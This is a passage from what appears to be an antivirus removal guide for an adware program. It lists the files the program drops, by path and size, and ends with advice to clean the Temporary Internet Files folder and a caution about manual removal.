    %Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
    %Program Files%\Supporter\Supporter.dll (262021 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
